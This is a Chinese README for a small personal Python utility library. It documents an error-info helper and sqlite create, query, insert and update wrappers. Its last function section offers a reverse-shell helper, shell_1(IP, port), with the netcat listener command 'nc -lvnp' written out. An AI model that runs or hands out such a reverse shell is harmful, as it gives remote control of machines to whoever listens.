# 项目简介

把一些常用的功能写成函数

---

# 函数大全

```
XiaoKang/
├──  常用                    # 常用的功能
│   └──  报错信息            # 报错的时候执行会显示报错信息
├──  sqlite                 #sqlite数据库的操作
│   ├──  db_sql             #提供sql语句，执行sql语句
│   ├──  db_cj              #提供字段和类型，创建数据表
│   ├──  db_dq              #提供sql语句和查找的值，进行查找数据
│   ├──  db_xr              #提供表、字段、值，进行写入数据
│   ├──  db_xg              #提供表、查找字段、查找值，写入字段、写入值，进行写入数据
├──  shell                  #shell反弹
│   └──  shell_1            #反弹shell到nc -lvnp 端口
└── 结束
```

# 函数讲解

所有的函数讲解怎么使用，和什么功能，你地，明白！？

## 1.ChangYong（常用）

### 1.1 BaoCuoXingxi（报错信息）

讲解功能：在代码执行的时候，如果报错可以执行这个，查看详细的报错信息

示例代码：

```
try:
    print('1'+1)
except:
    print(BaoCuoXingxi('json'))

输出：

{
    "报错类型":"<class 'TypeError'>",
    "报错信息":"can only concatenate str (not \"int\") to str",
    "报错文件":"C:\\xxx\\xxxx\\xxxxx\\test_1.py",
    "报错行数":6
}
```

## 2.sqlite（sqlite数据库）

### 2.1 db_sql（执行sql语句）

```
db_sql(sql, 数据库='主记录表')
    sql：sql的执行语句
    数据库：XXX.db文件，默认链接='主记录表'
```

返回：

```
(返回执行情况[真/假]，返回执行后的数据表)
```

---

### 2.2 db_cj（创建数据表）

```
db_cj(表名, 字段, 字段类型: dict = {}, 默认值='TEXT', 数据库='主记录表')
表名：创建的表名
字段[]：创建表中的字段
字段类型{}：指定创建字段的类型
默认值：在没有指定的情况下创建字段的默认值='TEXT'
数据库：XXX.db文件，默认链接='主记录表'
```

返回：

```
返回创建情况[真/假]
```

---

### 2.3 db_dq（读取数据）

```
db_dq(sql, value: tuple = '', 数据库='主记录表')
sql：查询数据的sql语句
value()：sql语句中的'?'值，防止被注入
数据库：XXX.db文件，默认链接='主记录表'
```

返回：

```
(返回执行情况[真/假]，返回执行后的数据表)
```

---

### 2.4 db_xr（新增写入数据）

```
db_xr(表: str, 段: list, 值: list, 数据库='主记录表')
表: 写入数据的表名
段: 写入的字段名
值: 写入的字段值
数据库: 写入的数据库名默认数据库='主记录表'
```

返回：

```
(返回执行情况[真/假]，返回自增值序号)
```

---

### 2.5 db_xg（修改已有数据）

```
db_xg(表: str, 查段: list, 查值: tuple, 写段: list, 写值: tuple, 数据库='主记录表')
表: 修改数据的表名
查段: 判断修改数据的字段名
查值: 字段名对应的值确保数据修改
写段: 需要修改的字段名
写值: 修改字段的值
数据库: 需要修改的数据名：默认值='主记录表'
```

返回：

```
(返回修改情况[真/假])
```

---

## 3.shell（shell反弹）

### 3.1 shell_1

```
用法: python shell.py <IP> <端口>

shell_1(<IP>, <端口>)

服务器开启监听
nc -lvnp 端口
```

# 安装方法

pip 安装大法

---

# 使用示例

导入函数会吧，不会自己学

---

# 依赖说明

目前没用使用其他依赖，都是用本地库

---

# 作者信息

作者：小康、米汤、鲁班

---
